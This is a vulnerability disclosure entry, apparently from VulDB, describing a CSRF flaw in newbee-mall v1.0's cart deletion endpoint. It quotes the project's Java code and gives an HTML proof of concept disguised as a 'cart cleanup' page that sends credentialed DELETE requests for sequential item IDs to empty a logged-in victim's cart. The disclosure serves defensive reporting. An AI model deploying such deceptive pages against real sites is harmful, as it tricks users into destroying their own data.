| Title | newbee-ltd newbee-mall v1.0 CSRF |
|---|
| Description | # CSRF Vulnerability in Shopping Cart Item Deletion
## Summary
A **CSRF vulnerability** exists in the shopping cart deletion endpoint `DELETE /shop-cart/{cartItemId}`. Any attacker-controlled page visited by a logged-in user can empty that user's shopping cart, causing inconvenience and the loss of carefully curated selections.
## Vulnerability Details
### Configuration-Level Issue
**File**: `src/main/java/ltd/newbee/mall/config/NeeBeeMallWebMvcConfigurer.java`
```java
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.context.annotation.Configuration;
import org.springframework.web.servlet.config.annotation.InterceptorRegistry;
import org.springframework.web.servlet.config.annotation.WebMvcConfigurer;
import ltd.newbee.mall.interceptor.NewBeeMallLoginInterceptor;

@Configuration
public class NeeBeeMallWebMvcConfigurer implements WebMvcConfigurer {
    @Autowired
    private NewBeeMallLoginInterceptor newBeeMallLoginInterceptor; // only checks that a user session exists

    @Override
    public void addInterceptors(InterceptorRegistry registry) {
        registry.addInterceptor(newBeeMallLoginInterceptor)
                .addPathPatterns("/shop-cart/**");
        // ❌ No CSRF token validation: a logged-in session cookie is all a request needs
    }
}
```
### Endpoint-Level Code Analysis
**File**: `src/main/java/ltd/newbee/mall/controller/mall/ShoppingCartController.java` (Lines 93-105)
```java
@DeleteMapping("/shop-cart/{newBeeMallShoppingCartItemId}")
@ResponseBody
public Result updateNewBeeMallShoppingCartItem(@PathVariable("newBeeMallShoppingCartItemId") Long newBeeMallShoppingCartItemId,
                                               HttpSession httpSession) {
    NewBeeMallUserVO user = (NewBeeMallUserVO) httpSession.getAttribute(Constants.MALL_USER_SESSION_KEY);
    // ❌ No CSRF token validation
    // ⚠️ Cart item IDs are sequential and predictable
    Boolean deleteResult = newBeeMallShoppingCartService.deleteById(newBeeMallShoppingCartItemId, user.getUserId());
    if (deleteResult) {
        return ResultGenerator.genSuccessResult();
    }
    return ResultGenerator.genFailResult(ServiceResultEnum.OPERATE_ERROR.getResult());
}
```
**Security Issues**:
1. ❌ No CSRF token validation: the only check is the session cookie, which the browser attaches automatically.
2. ⚠️ Cart item IDs are predictable (sequential integers), so an attacker does not need to know the victim's actual item IDs.
3. ⚠️ Because the IDs are guessable, a single page can issue many DELETE requests and remove every item in the cart at once.
## Proof of Concept (PoC)
```html
<!DOCTYPE html>
<html>
<head>
    <title>Cart Cleanup Service</title>
</head>
<body>
    <h2>Cleaning expired items from cart...</h2>
    <div id="progress">Processing...</div>
    <script>
        // Delete cart items by guessing sequential IDs
        var deletedCount = 0;
        for (var i = 1; i <= 100; i++) {
            fetch('http://localhost:28089/shop-cart/' + i, {
                method: 'DELETE',
                credentials: 'include'
            })
            .then(response => response.json())
            .then(data => {
                if (data.resultCode == 200) {
                    deletedCount++;
                    document.getElementById('progress').innerHTML =
                        'Removed ' + deletedCount + ' expired items';
                }
            });
        }
        setTimeout(function() {
            document.getElementById('progress').innerHTML = '✅ Cart cleanup complete!';
        }, 3000);
    </script>
</body>
</html>
```
## Impact
**Shopping cart emptying causing user inconvenience**: users lose their saved shopping selections and must rebuild their carts, leading to frustration and potential loss of business.
---
**CVSS Score**: 5.3 (Medium)
|
| Source | ⚠️ https://github.com/newbee-ltd/newbee-mall/issues/112 |
| User | flashzyc (UID 92850) |
| Submission | 02/05/2026 11:57 (4 months ago) |
| Moderation | 02/18/2026 07:56 (13 days later) |
| Status | Duplicate |
| VulDB entry | 346456 [newbee-ltd newbee-mall up to a069069b07027613bf0e7f571736be86f431faee Multiple Endpoints cross-site request forgery] |
| Points | 0 |